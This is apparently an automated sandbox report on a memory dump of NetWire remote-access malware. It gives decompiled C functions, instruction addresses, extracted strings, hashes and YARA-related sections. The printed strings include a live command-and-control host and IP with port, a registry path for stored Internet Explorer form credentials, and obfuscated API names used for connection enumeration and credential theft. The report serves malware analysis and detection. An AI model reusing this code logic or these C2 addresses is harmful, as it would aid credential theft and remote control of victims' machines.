				if(_t150 == 0) {
					_t150 = E00407F8E(_t223, _v964, E004081AA("Ed590WYd66XlCnd_4idLCldD"));
				}
				_t224 = _t223 & 0xffffff00 | _t211 == 0x00000000;
				_t222 = _t220 & 0xffffff00 | _v972 == 0x00000000 | _t223 & 0xffffff00 | _t211 == 0x00000000;
				if((_t220 & 0xffffff00 | _v972 == 0x00000000 | _t223 & 0xffffff00 | _t211 == 0x00000000) != 0 || _t150 == 0) {
					L24:
					_t212 =  &_v944;
					if(_v936 == 0) {
						_v1008 = 0;
						_v1012 = 0;
						_v1016 = 0xe5;
					} else {
						_v1008 = E00412540( &_v944);
						_v1016 = 0xe4;
						_v1012 = _v944;
					}
					E00405D7D(_t224, _a4);
					E004123B1(_t212);
					E00407FAB(_v976);
					E00407FAB(_v968);
					return E00407FAB(_v964);
				} else {
					_t232 =  &_v948;
					_v948 = 0;
					_v1000 = 0;
					_v1004 = 5;
					_v1008 = 2;
					_v1012 = 1;
					_v1016 = _t232;
					_v1020 = 0;
					_t162 =  *_t211();
					_t238 = _t237 - 0x18;
					if(_t162 != 0x7a) {
						L14:
						_t213 =  &_v972;
						_v972 = 0;
						_v1024 = 0;
						_v1028 = 1;
						_v1032 = 2;
						_v1036 = 1;
						_v1040 = _t213;
						 *_t238 = 0;
						_t163 = _v996();
						_t239 = _t238 - 0x18;
						if(_t163 != 0x7a) {
							goto L24;
						}
						_t164 = _v996;
						_v1068 = _t164;
						L0041F714();
						_v1000 = _t164;
						if(_t164 == 0) {
							goto L24;
						}
						_v1048 = 0;
						_v1052 = 1;
						_v1056 = 2;
						_v1060 = 1;
						_v1064 = _t213;
						_v1068 = _t164;
						_t165 = _v1020();
						_t240 = _t239 - 0x18;
						if(_t165 != 0) {
							L22:
							if(_v1024 != 0) {
								E00407F59( &_v1024);
							}
							goto L24;
						}
						_t233 = 0;
						_t235 =  &_v876;
						while(1) {
							_t168 = _v1024;
							if(_t233 >=  *_t168) {
								goto L22;
							}
							_t214 = _t233 * 0xc;
							_t169 = _t168 + _t214;
							_t170 =  *(_t169 + 8) & 0x0000ffff;
							_v1092 = _t170;
							L0041F914();
							_v1096 =  *((intOrPtr*)(_t169 + 4));
							_v1048 = _t170;
							L0041F924();
							_v1088 = _t170;
							_v1092 = 0x422c01;
							_v1096 = 0x40;
							_v1084 = _v1052 & 0x0000ffff;
							 *_t240 =  &_v1012;
							E004127A8();
							_v1092 = 0x104;
							_v1096 = _t235;
							 *_t240 =  *(_v1032 + _t214 + 0xc);
							E00402570(_t222, _t224, __eflags, _t222, _t224);
							_v1080 =  &_v1012;
							_t216 =  &_v624;
							_v1088 = _t235;
							_v1092 = 0x422c07;
							_v1096 = 0x204;
							 *_t240 = _t216;
							_v1084 =  *((intOrPtr*)(_t214 + _v1032 + 0xc));
							_t179 = E004127A8();
							__eflags = _t179;
							if(_t179 > 0) {
								_v1092 = _t179;
								_v1096 = _t216;
								 *_t240 =  &_v1024;
								E00412458( &_v1024, _t224);
							}
							_t233 = _t233 + 1;
							__eflags = _t233;
						}
						goto L22;
					}
					_t182 = _v972;
					 *_t238 = _t182;
					L0041F714();
					_v980 = _t182;
					if(_t182 == 0) {
						goto L24;
					}
					_v1024 = 0;
					_v1028 = 5;
					_v1032 = 2;
					_v1036 = 1;
					_v1040 = _t232;
					 *_t238 = _t182;
					_t183 =  *_t211();
					_t238 = _t238 - 0x18;
					if(_t183 != 0) {
						L12:
						if(_v1004 != 0) {
							E00407F59( &_v1004);
						}
						goto L14;
					}
					_t234 = 0;
					_t236 =  &_v916;
					while(1) {
						_t186 = _v1004;
						if(_t234 >=  *_t186) {
							goto L12;
						}
						_t217 = _t234 * 0x18;
						_t187 = _t186 + _t217;
						_t188 =  *(_t187 + 0xc) & 0x0000ffff;
						_v1068 = _t188;
						L0041F914();
						_v1072 =  *((intOrPtr*)(_t187 + 8));
						_v1010 = _t188;
						L0041F924();
						_v1064 = _t188;
						_v1068 = "%s:%u";
						_v1072 = 0x40;
						_v1060 = _v1014 & 0x0000ffff;
						_v1076 =  &_v988;
						E004127A8();
						_t192 = _v1012 + _t217;
						_t193 =  *(_t192 + 0x14) & 0x0000ffff;
						_v1076 = _t193;
						L0041F914();
						_v1080 =  *((intOrPtr*)(_t192 + 0x10));
						_v1018 = _t193;
						L0041F924();
						_v1072 = _t193;
						_v1076 = "%s:%u";
						_v1080 = 0x40;
						_v1084 = _t236;
						_v1068 = _v1022 & 0x0000ffff;
						_t231 =  &_v868;
						E004127A8(_t222, _t224, _t222, _t224);
						_v1076 = 0x104;
						E00402570(_t222, _t224, __eflags, ( &(_v1020[_t217]))[0x18], _t231);
						_v1056 = E004081AA( *((intOrPtr*)(0x422ca0 + ( &(_v1020[_t217]))[4] * 4)));
						_v1060 = _t236;
						_v1064 =  &_v996;
						_t219 =  &_v608;
						_v1072 = _t231;
						_v1076 = 0x422bed;
						_v1080 = 0x204;
						_v1084 = _t219;
						_v1068 = ( &(_v1020[_t217]))[0x18];
						_t206 = E004127A8();
						__eflags = _t206;
						if(_t206 > 0) {
							E00412458( &_v1008, _t224,  &_v1008, _t219, _t206);
						}
						_t234 = _t234 + 1;
						__eflags = _t234;
					}
					goto L12;
				}
			}

0x0040262f
0x0040262f
0x00402633
0x00402648
0x00402654
0x00402659
0x00402660
0x00402664
0x00402669
0x00402670
0x00402674
0x00402679
0x00402680
0x00402694
0x00402699
0x004026a0
0x004026b2
0x004026b7
0x004026be
0x004026d2
0x004026d9
0x004026f2
0x004026f2
0x00402701
0x00402704
0x00402706
0x00402a74
0x00402a79
0x00402a7d
0x00402a9d
0x00402aa5
0x00402aad
0x00402a7f
0x00402a87
0x00402a8f
0x00402a97
0x00402a97
0x00402abf
0x00402ac7
0x00402ad3
0x00402adf
0x00402afa
0x00402714
0x00402714
0x00402718
0x00402720
0x00402728
0x00402730
0x00402738
0x00402740
0x00402744
0x0040274b
0x0040274d
0x00402753
0x004028fa
0x004028fa
0x004028fe
0x00402906
0x0040290e
0x00402916
0x0040291e
0x00402926
0x0040292a
0x00402931
0x00402935
0x0040293b
0x00000000
0x00000000
0x00402941
0x00402945
0x00402948
0x0040294f
0x00402953
0x00000000
0x00000000
0x00402959
0x00402961
0x00402969
0x00402971
0x00402979
0x0040297d
0x00402980
0x00402984
0x00402989
0x00402a61
0x00402a66
0x00402a6f
0x00402a6f
0x00000000
0x00402a66
0x0040298f
0x00402991
0x00402a55
0x00402a55
0x00402a5b
0x00000000
0x00000000
0x0040299d
0x004029a0
0x004029a5
0x004029a9
0x004029ac
0x004029b2
0x004029b5
0x004029ba
0x004029c5
0x004029cd
0x004029d5
0x004029dd
0x004029e1
0x004029e4
0x004029ed
0x004029f5
0x004029fe
0x00402a01
0x00402a0e
0x00402a15
0x00402a1c
0x00402a20
0x00402a28
0x00402a30
0x00402a33
0x00402a37
0x00402a3c
0x00402a3e
0x00402a40
0x00402a48
0x00402a4c
0x00402a4f
0x00402a4f
0x00402a54
0x00402a54
0x00402a54
0x00000000
0x00402a55
0x00402759
0x0040275d
0x00402760
0x00402767
0x0040276b
0x00000000
0x00000000
0x00402771
0x00402779
0x00402781
0x00402789
0x00402791
0x00402795
0x00402798
0x0040279a
0x0040279f
0x004028e7
0x004028ec
0x004028f5
0x004028f5
0x00000000
0x004028ec
0x004027a5
0x004027a7
0x004028db
0x004028db
0x004028e1
0x00000000
0x00000000
0x004027b3
0x004027b6
0x004027bb
0x004027bf
0x004027c2
0x004027c8
0x004027cb
0x004027d0
0x004027db
0x004027e3
0x004027eb
0x004027f3
0x004027f7
0x004027fa
0x00402803
0x00402808
0x0040280c
0x0040280f
0x00402815
0x00402818
0x0040281d
0x00402828
0x0040282c
0x00402834
0x0040283c
0x0040283f
0x00402843
0x0040284a
0x00402853
0x00402867
0x00402888
0x00402890
0x00402894
0x0040289b
0x004028a2
0x004028a6
0x004028ae
0x004028b6
0x004028b9
0x004028bd
0x004028c2
0x004028c4
0x004028d5
0x004028d5
0x004028da
0x004028da
0x004028da
0x00000000
0x004028db

Strings

psapi.dll, xrefs: 00402659
kernel32.dll, xrefs: 00402669
Ed590WYd66XlCnd_4idLCldD, xrefs: 004026B7, 004026DB
@, xrefs: 004029D5
Ed5jf5dRSdSuSsqCVid, xrefs: 00402699
%s:%u, xrefs: 004027E3, 0040282C
%s:%d, xrefs: 004029CD
Ed5jf5dRSdSqYsqCVid, xrefs: 00402679
iphlpapi.dll, xrefs: 0040264D

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: %s:%d$%s:%u$@$Ed590WYd66XlCnd_4idLCldD$Ed5jf5dRSdSqYsqCVid$Ed5jf5dRSdSuSsqCVid$iphlpapi.dll$kernel32.dll$psapi.dll
API String ID: 0-1859760768
Opcode ID: ecfa040b99fdd072a25a0974f1507886e54ec2cabcd5e23ee5df752222c6d893
Instruction ID: 64c6eb304da1bd60933a222d55b1bae016526deff2b752f498ff56c04a6099ea
Opcode Fuzzy Hash: ecfa040b99fdd072a25a0974f1507886e54ec2cabcd5e23ee5df752222c6d893
Instruction Fuzzy Hash: 28D1A3B4908341ABC710AF65C58965EFBF0BF84748F418C2EF8C897291D7B9D988CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00408E7F, Relevance: 10.1, Strings: 8, Instructions: 72COMMON

Download Yara Rule

Strings

, xrefs: 00408F6F
, xrefs: 00408EDF
%Rand%, xrefs: 00408EF7
SOFTWARE\NetWire, xrefs: 00408EBB, 00408F3A, 00408F97, 00408FC3
, xrefs: 00408F26
Install Date, xrefs: 00408F32, 00408FBB
JAN, xrefs: 00408EEF, 00408F0F, 00408F5F
HostId, xrefs: 00408EB3, 00408F8F

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: $ $ $%Rand%$HostId$Install Date$JAN$SOFTWARE\NetWire
API String ID: 0-786908300
Opcode ID: 8d9fa1ce1227cd48d07afd670ca600cc309de693e6a65e3e096cff891438ab6d
Instruction ID: 4d253b419a98ff4c59b7894da0d5b96d3c68cf9a0106b0f9d5c8600cdd8dc3cd
Opcode Fuzzy Hash: 8d9fa1ce1227cd48d07afd670ca600cc309de693e6a65e3e096cff891438ab6d
Instruction Fuzzy Hash: BE3193B0109311ABD700AF11D68929FBBE1AF80748F51CC1EE5D85B256D7FE8588CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 0040D745, Relevance: 9.0, Strings: 7, Instructions: 232COMMON

Download Yara Rule

Strings

E, xrefs: 0040D98F
K, xrefs: 0040D9A5
, xrefs: 0040D7AF
Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 0040D7F9
/, xrefs: 0040DA54
rb+, xrefs: 0040D756
A, xrefs: 0040D99A

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: $/$A$E$K$Software\Microsoft\Internet Explorer\IntelliForms\Storage2$rb+
API String ID: 0-417429986
Opcode ID: 17987caa90f594d4a55626d029de0f9e4765c5bc8f064db7406c04733c776cae
Instruction ID: b3a366508a3bf55356eea0268f728a85e1b25c4e3c11778993a5dcbc8714eb01
Opcode Fuzzy Hash: 17987caa90f594d4a55626d029de0f9e4765c5bc8f064db7406c04733c776cae
Instruction Fuzzy Hash: B2A1C2B09083419BD710EFA5C18465BBBE0AF85358F00882EF5D897391D7B9D989DF4A

Uniqueness

Uniqueness Score: -1.00%

Function 00401421, Relevance: 8.9, Strings: 7, Instructions: 101COMMON

Download Yara Rule

Strings

TEMP, xrefs: 00401550
%s\%s.%s, xrefs: 0040145A
%, xrefs: 0040151E
\, xrefs: 00401530
s, xrefs: 00401528
%, xrefs: 00401538
s, xrefs: 00401540

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: %$%$%s\%s.%s$TEMP$\$s$s
API String ID: 0-3075679649
Opcode ID: 89cb20cf2dea8ad77aae30bef6cdbecb0b37b5e693641a521aedb572dfca6291
Instruction ID: f04d716bfdf1a3b2f19b14ba05fef692e22545d8b3c1490e52eb58049ae1adaa
Opcode Fuzzy Hash: 89cb20cf2dea8ad77aae30bef6cdbecb0b37b5e693641a521aedb572dfca6291
Instruction Fuzzy Hash: 435196B040C385DEE720EF25D54879EBBE0BF84348F408D2EE5D887281E7B99588DB56

Uniqueness

Uniqueness Score: -1.00%

Function 00408B1A, Relevance: 8.8, Strings: 7, Instructions: 58COMMON

Download Yara Rule

Strings

&, xrefs: 00408BE8
075, xrefs: 00408C50
Password, xrefs: 00408B78
001, xrefs: 00408C38
chongmei33.myddns.rocks:57438;37.120.208.40:57438;, xrefs: 00408B48
000, xrefs: 00408C20
JAN, xrefs: 00408B90

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: &$000$001$075$JAN$Password$chongmei33.myddns.rocks:57438;37.120.208.40:57438;
API String ID: 0-1052144291
Opcode ID: 35587c5c701385df943a746cf7bb302fd0de4502a5840f6354f21f0f9562dd1c
Instruction ID: d012676997c43d0a4f60e6223c36ad427c2154accf07b5176cb32dd979716e27
Opcode Fuzzy Hash: 35587c5c701385df943a746cf7bb302fd0de4502a5840f6354f21f0f9562dd1c
Instruction Fuzzy Hash: 3E3100B0109711AAD300EF56D2D925EBEE0BF84748F91CC2EE1C94B251C7F985C99B97

Uniqueness

Uniqueness Score: -1.00%

Function 0040DCE9, Relevance: 7.9, Strings: 6, Instructions: 395
COMMON

Download Yara Rule

C-Code - Quality: 15%

			E0040DCE9(signed int __edx, void* _a4) {
				intOrPtr* _v52;
				char _v488;
				char _v492;
				char _v684;
				char _v908;
				char _v1032;
				char _v1036;
				void _v1068;
				void _v1084;
				void _v1092;
				void _v1096;
				void _v1100;
				void _v1104;
				void _v1108;
				char _v1132;
				char _v1136;
				char _v1148;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				intOrPtr _v1172;
				intOrPtr _v1176;
				char* _v1180;
				signed int _v1188;
				intOrPtr* _v1196;
				intOrPtr _v1204;
				signed int _v1212;
				signed int _v1220;
				char* _v1224;
				void _v1228;
				void _v1232;
				void _v1236;
				signed char _v1240;
				void* _v1244;
				signed char _v1248;
				intOrPtr _v1252;
				void _v1256;
				void _v1264;
				void _v1268;
				signed char _v1272;
				char* _v1276;
				signed char _v1280;
				intOrPtr _v1284;
				void _v1288;
				void _v1296;
				char* _v1300;
				signed char _v1304;
				char* _v1308;
				signed char _v1312;
				intOrPtr _v1316;
				void _v1320;
				void _v1324;
				void _v1328;
				void* _v1332;
				void _v1336;
				void _v1340;
				char _v1344;
				char _v1348;
				signed char _v1352;
				signed char _v1356;
				void _v1360;
				signed char _v1364;
				signed char _v1368;
				void _v1372;
				signed char _v1376;
				void _v1380;
				void _v1384;
				signed char _v1396;
				signed char _v1400;
				char* _v1404;
				char* _v1408;
				char* _v1412;
				char _v1416;
				char* _t211;
				char* _t212;
				intOrPtr* _t213;
				void* _t214;
				intOrPtr* _t215;
				char _t216;
				void* _t217;
				signed int _t218;
				void _t224;
				void* _t229;
				void* _t233;
				void* _t250;
				char* _t251;
				intOrPtr _t257;
				void* _t278;
				void _t279;
				signed char _t285;
				void* _t288;
				intOrPtr* _t289;
				char* _t290;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed char _t299;
				void _t301;
				signed char _t303;
				intOrPtr* _t310;
				signed char _t311;
				intOrPtr _t312;
				signed char _t313;
				char* _t316;
				void* _t317;
				char* _t318;
				signed char _t319;
				char _t320;
				void* _t321;
				char** _t324;
				void* _t326;
				void* _t329;

				_t295 = __edx;
				_v1108 = 0;
				 *(memcpy( &_v1084, 0x4228a0, 4 << 2)) = 0;
				_v1104 = 0;
				_v1100 = 0;
				_v1096 = 0;
				_v1092 = 0;
				memcpy( &_v1068, 0x4228b0, 4 << 2);
				_t324 = _t321 - 0x48c + 0x18;
				_t211 = E004081AA("2CQi5Yi4.Sii");
				_v1180 = _t211;
				L0041F55C();
				_t316 = _t211;
				_t212 = 0;
				_push(_t288);
				if(_t316 == 0) {
					L38:
					return _t212;
				}
				 *_t324 = "zCQi5TsdRzCQi5";
				_t213 = E004081AA();
				 *_t324 = _t316;
				_v1180 = _t213;
				L0041F5AC();
				_push(_t295);
				_t310 = _t213;
				 *_t324 = "zCQi5PiW6dzCQi5";
				_t214 = E004081AA(_t295);
				 *_t324 = _t316;
				_v1188 = _t214;
				L0041F5AC();
				_push(0);
				 *_t324 = "zCQi5jRQld0C5dX5dl6";
				_v1148 = _t214;
				_t215 = E004081AA(0);
				 *_t324 = _t316;
				_v1196 = _t215;
				L0041F5AC();
				_push(_t288);
				_t289 = _t215;
				 *_t324 = "zCQi5Ed5X5dl";
				_t216 = E004081AA(_t288);
				 *_t324 = _t316;
				_v1204 = _t216;
				L0041F5AC();
				_push(_t317);
				 *_t324 = "zCQi5Ed5X5dl";
				_v1160 = _t216;
				_t217 = E004081AA(_t317);
				 *_t324 = _t316;
				_v1212 = _t217;
				L0041F5AC();
				_push(_t295);
				_v1224 = "zCQi5_0dd";
				_v1164 = _t217;
				_t218 = E004081AA(_t295);
				_v1224 = _t316;
				_v1220 = _t218;
				L0041F5AC();
				_push(0);
				_push(0);
				_t296 = _t295 & 0xffffff00 | _t310 == 0x00000000;
				_v1188 = _t218;
				_t297 = _t296 & 0xffffff00 | _v1180 == 0x00000000;
				_t298 = _t297 & 0xffffff00 | _v1176 == 0x00000000;
				_t299 = _t298 & 0xffffff00 | _v1172 == 0x00000000;
				if((_t218 & 0xffffff00 | _t289 == 0x00000000 | _t296 | _t297 | _t298 | _t299) != 0 || _v1188 == 0) {
					L3:
					_t290 = 0;
					goto L33;
				} else {
					_v1228 = 0;
					_v1224 =  &_v1156;
					_v1232 =  &_v1136;
					_t229 =  *_t310();
					_t324 = _t324 - 0xc;
					if(_t229 != 0) {
						goto L3;
					}
					_v1240 = 0x200;
					_v1232 =  &_v1160;
					_v1236 =  &_v1164;
					_v1244 = _v1168;
					_t233 =  *_t289();
					_t324 = _t324 - 0x10;
					if(_t233 != 0 || _v1180 == 0) {
						goto L3;
					} else {
						if(E004132E6(0, _t299) != 0xa) {
							if(E004132E6(0, _t299) == 0xc || E004132E6(0, _t299) == 0xb || E004132E6(0, _t299) == 0xe || E004132E6(0, _t299) == 0xd || E004132E6(0, _t299) == 0xf) {
								goto L8;
							} else {
								_v1212 = 0;
								_t290 = 0;
								while(_v1212 < _v1180) {
									_v1252 = 0x10;
									_t299 = _v1212 * 0x34 + _v1176;
									_v1256 =  &_v1148;
									 *_t324 = _t299;
									_t313 = _t299;
									if(E004129C0() == 0) {
										_v1232 = 0;
										_v1236 = 0;
										_v1240 = 0x100;
										_v1248 = 0xffffffff;
										_v1244 =  &_v1132;
										_v1256 = 0;
										 *_t324 = 0;
										_v1252 =  *((intOrPtr*)(_t313 + 0x10));
										L0041F4DC();
										_t329 = _t324 - 0x20;
										_v1264 = 0;
										_v1268 = 0;
										_v1272 = 0x100;
										_v1280 = 0xffffffff;
										_v1276 =  &_v908;
										_v1288 = 0;
										 *_t329 = 0;
										_v1284 =  *((intOrPtr*)(_t313 + 0x14)) + 0x20;
										L0041F4DC();
										_t319 =  &_v684;
										_v1296 = 0;
										_v1300 = 0;
										_v1304 = 0x100;
										_v1312 = 0xffffffff;
										_v1308 = _t319;
										_v1320 = 0;
										_v1324 = 0;
										_v1316 =  *((intOrPtr*)(_t313 + 0x18)) + 0x20;
										L0041F4DC();
										_v1336 = 0;
										_v1340 = 0;
										_v1268 = 0;
										_v1332 =  &_v1268;
										_v1344 =  *((intOrPtr*)(_t313 + 0x18));
										_v1352 = _t313;
										_v1348 =  *((intOrPtr*)(_t313 + 0x14));
										_v1356 = _v1280;
										_t278 = _v1300();
										_t324 = _t329 - 0xffffffffffffffe4;
										if(_t278 == 0) {
											_t303 =  &_v488;
											_v1356 = 0;
											_v1360 = 0;
											_v1364 = 0x100;
											_v1368 = _t303;
											_v1372 = 0xffffffff;
											_v1380 = 0;
											_v1384 = 0;
											_v1324 = _t303;
											_v1376 =  *((intOrPtr*)(_v1296 + 0x1c)) + 0x20;
											L0041F4DC();
											_t324 = _t324 - 0x20;
											_t299 = _v1356;
											_v1400 = _t319;
											_t320 =  &_v1324;
											_v1408 = 2;
											_v1412 = 0x4239a1;
											_v1404 =  &_v1032;
											_v1324 = 0;
											_v1396 = _t299;
											_v1416 = _t320;
											_t285 = E00412755( &_v1032);
											_t313 = _t285;
											if(_t285 != 0xffffffff) {
												_v1404 = _t285;
												_v1412 = _t290;
												_v1400 = 1;
												_v1408 = _t320;
												_t290 = _t290 + _t313;
												_v1416 =  &_v1344;
												_v1344 = E00412ABF(0);
											}
										}
										_t279 = _v1296;
										if(_t279 != 0) {
											_v1384 = _t279;
											_v1340();
											_push(_t313);
										}
									}
									_v1336 =  &(1[_v1336]);
								}
								L33:
								_t224 = _v1148;
								if(_t224 != 0) {
									_v1232 = _t224;
									_t224 = _v1188();
									_push(0);
								}
								if(_v1156 != 0) {
									_v1232 =  &_v1156;
									_t224 = _v1180();
									_push(_t299);
								}
								_v1232 = _t316;
								L0041F614();
								_push(_t224);
								 *_v52 = _t290;
								_t212 = _v1164;
								goto L38;
							}
						}
						L8:
						_v1212 = 0;
						_t290 = 0;
						while(_v1212 < _v1180) {
							_v1252 = 0x10;
							_t299 = _v1212 * 0x38 + _v1176;
							_v1256 =  &_v1148;
							 *_t324 = _t299;
							_t311 = _t299;
							if(E004129C0() == 0) {
								_v1232 = 0;
								_v1236 = 0;
								_v1240 = 0x100;
								_v1248 = 0xffffffff;
								_v1244 =  &_v1132;
								_v1256 = 0;
								 *_t324 = 0;
								_v1252 =  *((intOrPtr*)(_t311 + 0x10));
								L0041F4DC();
								_t326 = _t324 - 0x20;
								_v1264 = 0;
								_v1268 = 0;
								_v1272 = 0x100;
								_v1280 = 0xffffffff;
								_v1276 =  &_v908;
								_v1288 = 0;
								 *_t326 = 0;
								_v1284 =  *((intOrPtr*)(_t311 + 0x14)) + 0x20;
								L0041F4DC();
								_t318 =  &_v684;
								_v1296 = 0;
								_v1300 = 0;
								_v1304 = 0x100;
								_v1312 = 0xffffffff;
								_v1308 = _t318;
								_v1320 = 0;
								_v1324 = 0;
								_v1316 =  *((intOrPtr*)(_t311 + 0x18)) + 0x20;
								L0041F4DC();
								_v1332 = 0;
								_v1336 = 0;
								_v1340 = 0;
								_v1268 = 0;
								_v1328 =  &_v1268;
								_v1344 =  *((intOrPtr*)(_t311 + 0x18));
								_v1352 = _t311;
								_v1348 =  *((intOrPtr*)(_t311 + 0x14));
								_v1356 = _v1280;
								_t250 = _v1296();
								_t324 = _t326 - 0xffffffffffffffe0;
								if(_t250 == 0) {
									_t301 =  &_v492;
									_v1360 = 0;
									_v1364 = 0;
									_v1368 = 0x100;
									_v1372 = _t301;
									_v1376 = 0xffffffff;
									_v1384 = 0;
									 *_t324 = 0;
									_v1332 = _t301;
									_v1380 = _v1300[0x1c] + 0x20;
									L0041F4DC();
									_t324 = _t324 - 0x20;
									_t299 = _v1364;
									_v1404 = _t318;
									_t318 =  &_v1328;
									_v1412 = 2;
									_v1416 = 0x4239a1;
									_v1408 =  &_v1036;
									_v1328 = 0;
									_v1400 = _t299;
									 *_t324 = _t318;
									_t257 = E00412755( &_v1036);
									_t312 = _t257;
									if(_t257 != 0xffffffff) {
										_v1408 = _t257;
										_v1416 = _t290;
										_v1404 = 1;
										_v1412 = _t318;
										_t290 = _t290 + _t312;
										 *_t324 =  &_v1348;
										_v1348 = E00412ABF(0);
									}
								}
								_t251 = _v1300;
								if(_t251 != 0) {
									 *_t324 = _t251;
									_v1344();
									_push(_t318);
								}
							}
							_v1340 =  &(1[_v1340]);
						}
						goto L33;
					}
				}
			}

0x0040dce9
0x0040dd08
0x0040dd20
0x0040dd26
0x0040dd2e
0x0040dd36
0x0040dd3e
0x0040dd46
0x0040dd46
0x0040dd4f
0x0040dd54
0x0040dd57
0x0040dd5c
0x0040dd5e
0x0040dd60
0x0040dd63
0x0040e3aa
0x0040e3b4
0x0040e3b4
0x0040dd69
0x0040dd70
0x0040dd75
0x0040dd78
0x0040dd7c
0x0040dd81
0x0040dd83
0x0040dd85
0x0040dd8c
0x0040dd91
0x0040dd94
0x0040dd98
0x0040dd9d
0x0040dd9f
0x0040dda6
0x0040ddaa
0x0040ddaf
0x0040ddb2
0x0040ddb6
0x0040ddbb
0x0040ddbd
0x0040ddbf
0x0040ddc6
0x0040ddcb
0x0040ddce
0x0040ddd2
0x0040ddd7
0x0040ddd9
0x0040dde0
0x0040dde4
0x0040dde9
0x0040ddec
0x0040ddf0
0x0040ddf5
0x0040ddf7
0x0040ddfe
0x0040de02
0x0040de07
0x0040de0a
0x0040de0e
0x0040de15
0x0040de16
0x0040de17
0x0040de1c
0x0040de2a
0x0040de34
0x0040de3e
0x0040de43
0x0040de4c
0x0040de4c
0x00000000
0x0040de53
0x0040de57
0x0040de5f
0x0040de67
0x0040de6a
0x0040de6c
0x0040de71
0x00000000
0x00000000
0x0040de77
0x0040de7f
0x0040de87
0x0040de8f
0x0040de92
0x0040de94
0x0040de99
0x00000000
0x0040dea2
0x0040deaa
0x0040dec0
0x00000000
0x0040deea
0x0040deea
0x0040def2
0x0040e164
0x0040e142
0x0040e14a
0x0040e14e
0x0040e152
0x0040e155
0x0040e15e
0x0040e17a
0x0040e182
0x0040e18a
0x0040e192
0x0040e19a
0x0040e1a1
0x0040e1a9
0x0040e1b0
0x0040e1b4
0x0040e1b9
0x0040e1c3
0x0040e1cb
0x0040e1d3
0x0040e1db
0x0040e1e3
0x0040e1ea
0x0040e1f2
0x0040e1fc
0x0040e200
0x0040e208
0x0040e20f
0x0040e217
0x0040e21f
0x0040e227
0x0040e22f
0x0040e236
0x0040e23e
0x0040e248
0x0040e24c
0x0040e258
0x0040e260
0x0040e268
0x0040e270
0x0040e277
0x0040e27e
0x0040e282
0x0040e28a
0x0040e28d
0x0040e291
0x0040e296
0x0040e2a0
0x0040e2a7
0x0040e2af
0x0040e2b7
0x0040e2bf
0x0040e2c3
0x0040e2ce
0x0040e2d6
0x0040e2dd
0x0040e2e4
0x0040e2e8
0x0040e2ed
0x0040e2f0
0x0040e2f4
0x0040e2ff
0x0040e303
0x0040e30b
0x0040e313
0x0040e317
0x0040e31f
0x0040e323
0x0040e326
0x0040e32e
0x0040e330
0x0040e332
0x0040e33a
0x0040e33e
0x0040e346
0x0040e34a
0x0040e34c
0x0040e354
0x0040e354
0x0040e330
0x0040e358
0x0040e35e
0x0040e364
0x0040e367
0x0040e36b
0x0040e36b
0x0040e35e
0x0040e160
0x0040e160
0x0040e371
0x0040e371
0x0040e377
0x0040e379
0x0040e37c
0x0040e380
0x0040e380
0x0040e386
0x0040e38c
0x0040e38f
0x0040e393
0x0040e393
0x0040e394
0x0040e397
0x0040e39c
0x0040e3a4
0x0040e3a6
0x00000000
0x0040e3a6
0x0040dec0
0x0040deac
0x0040deac
0x0040deb4
0x0040df24
0x0040df02
0x0040df0a
0x0040df0e
0x0040df12
0x0040df15
0x0040df1e
0x0040df3a
0x0040df42
0x0040df4a
0x0040df52
0x0040df5a
0x0040df61
0x0040df69
0x0040df70
0x0040df74
0x0040df79
0x0040df83
0x0040df8b
0x0040df93
0x0040df9b
0x0040dfa3
0x0040dfaa
0x0040dfb2
0x0040dfbc
0x0040dfc0
0x0040dfc8
0x0040dfcf
0x0040dfd7
0x0040dfdf
0x0040dfe7
0x0040dfef
0x0040dff6
0x0040dffe
0x0040e008
0x0040e00c
0x0040e018
0x0040e020
0x0040e028
0x0040e030
0x0040e038
0x0040e03f
0x0040e046
0x0040e04a
0x0040e052
0x0040e055
0x0040e059
0x0040e05e
0x0040e068
0x0040e06f
0x0040e077
0x0040e07f
0x0040e087
0x0040e08b
0x0040e096
0x0040e09e
0x0040e0a5
0x0040e0ac
0x0040e0b0
0x0040e0b5
0x0040e0b8
0x0040e0bc
0x0040e0c7
0x0040e0cb
0x0040e0d3
0x0040e0db
0x0040e0df
0x0040e0e7
0x0040e0eb
0x0040e0ee
0x0040e0f6
0x0040e0f8
0x0040e0fa
0x0040e102
0x0040e106
0x0040e10e
0x0040e112
0x0040e114
0x0040e11c
0x0040e11c
0x0040e0f8
0x0040e120
0x0040e126
0x0040e12c
0x0040e12f
0x0040e133
0x0040e133
0x0040e126
0x0040df20
0x0040df20
0x00000000
0x0040df24
0x0040de99

Strings

zCQi5jRQld0C5dX5dl6, xrefs: 0040DD9F
zCQi5TsdRzCQi5, xrefs: 0040DD69
zCQi5Ed5X5dl, xrefs: 0040DDBF, 0040DDD9
2CQi5Yi4.Sii, xrefs: 0040DD48
zCQi5_0dd, xrefs: 0040DDF7
zCQi5PiW6dzCQi5, xrefs: 0040DD85

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: 2CQi5Yi4.Sii$zCQi5Ed5X5dl$zCQi5PiW6dzCQi5$zCQi5TsdRzCQi5$zCQi5_0dd$zCQi5jRQld0C5dX5dl6
API String ID: 0-1136301387
Opcode ID: 87aafaf84040a22bc4a574d69e3875252030c0c31ccf32c7b5f1b702cec560f4
Instruction ID: 0411f2c87eaa10a6bc819440aee1928311a11f64f3fd3897648e7812cf6e01f9
